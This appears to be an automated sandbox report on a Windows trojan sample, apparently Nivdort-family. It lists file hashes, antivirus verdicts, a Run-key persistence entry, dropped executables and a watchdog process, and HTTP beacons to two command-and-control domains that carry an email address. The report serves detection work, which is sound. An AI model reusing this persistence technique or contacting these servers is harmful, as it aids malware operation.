Analysis Date: 2015-10-14 13:21:13
MD5: 7fecdc7614811410bfa8ebd4d6becc59
SHA1: 35b8bf0f6db9196bc35646bbb73d64790fef5cdc

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 00cbd83b972c70457324e12c86115cb5 sha1: b80fa32699b95058d447ca7b29a020949332c614 size: 301056
Section .rdata: md5: c5b639b1dedfdf846c857a7daca20fc6 sha1: 84bd74849ce837360e3820d3a8e2430c123172a7 size: 34816
Section .data: md5: ec713b50a15bd8f3789f1ac49782872c sha1: 8af5859d1554078d3b7cbcac4ee0ec25740976b4 size: 104448
Timestamp: 2014-10-30 10:07:30
Packer: Microsoft Visual C++ ?.?
PEhash: 0caaaa8e4a22353ed90d9965ceefb3db8c4422b2
IMPhash: 67acfc06d4a28ff7d524ad09f7dd0096
AV Rising: no_virus
AV CA (E-Trust Ino): no_virus
AV F-Secure: Gen:Variant.Symmi.22722
AV Dr. Web: no_virus
AV ClamAV: no_virus
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV BullGuard: Gen:Variant.Symmi.22722
AV Padvish: no_virus
AV VirusBlokAda (vba32): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Trend Micro: TSPY_NIVDORT.SMB
AV Kaspersky: Trojan.Win32.Generic
AV Zillya!: Trojan.Agent.Win32.581329
AV Emsisoft: Gen:Variant.Symmi.22722
AV Ikarus: Trojan.FBAccountLock
AV Frisk (f-prot): no_virus
AV Authentium: W32/Wonton.B.gen!Eldorado
AV MalwareBytes: Trojan.Agent.Gen
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.Z
AV K7: Trojan ( 004cb2771 )
AV BitDefender: Gen:Variant.Symmi.22722
AV Fortinet: W32/Agent.VNC!tr
AV Symantec: Downloader.Upatre!g15
AV Grisoft (avg): Win32/Cryptor
AV Eset (nod32): Win32/Agent.VNC
AV Alwil (avast): Downloader-TLD [Trj]
AV Ad-Aware: Gen:Variant.Symmi.22722
AV Twister: no_virus
AV Avira (antivir): BDS/Zegost.Gen4
AV Mcafee: Trojan-FEMT!7FECDC761481

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\PnP-X Topology Audio VC Link-Layer Filtering ➝ C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.aj
Creates File: C:\Documents and Settings\Administrator\Application Data\dbustprezf\hrclibwshct.exe
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\dbustprezf\oyupyzhjk.exe"

Network Details:

DNS: amountshout.net (Type: A) ➝ 208.100.26.234
DNS: collegestation.net (Type: A) ➝ 72.52.4.91
HTTP GET: http://amountshout.net/index.php?email=stephen@qwestcom.com.au&method=post&len
User-Agent: (empty)
HTTP GET: http://collegestation.net/index.php?email=stephen@qwestcom.com.au&method=post&len
User-Agent: (empty)
Flows TCP: 192.168.1.1:1031 ➝ 208.100.26.234:80
Flows TCP: 192.168.1.1:1032 ➝ 72.52.4.91:80

Raw Pcap
Strings